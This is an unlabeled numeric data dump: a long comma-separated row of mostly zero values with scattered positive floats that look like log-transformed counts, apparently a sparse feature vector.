0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.795790545596741, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 3.0841946160253872, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 3.58351893845611, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.007333185232471, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.7369991058576035, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.365976015021851, 0.0, 1.0986122886681098, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 4.418840607796598, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 1.7412592803704001, 0, 3.5263605246161616, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0, 0.0, 0.0, 8.317766166719343, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 4.48863636973214, 0.0, 0.0, 3.6109179126442243, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 4.1588830833596715, 12.46359237448458, 0.0, 0.0, 0.0, 0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.846735604451319, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.06534854782536, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 4.672828834461906, 0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.649511027115099, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.518263445217986, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 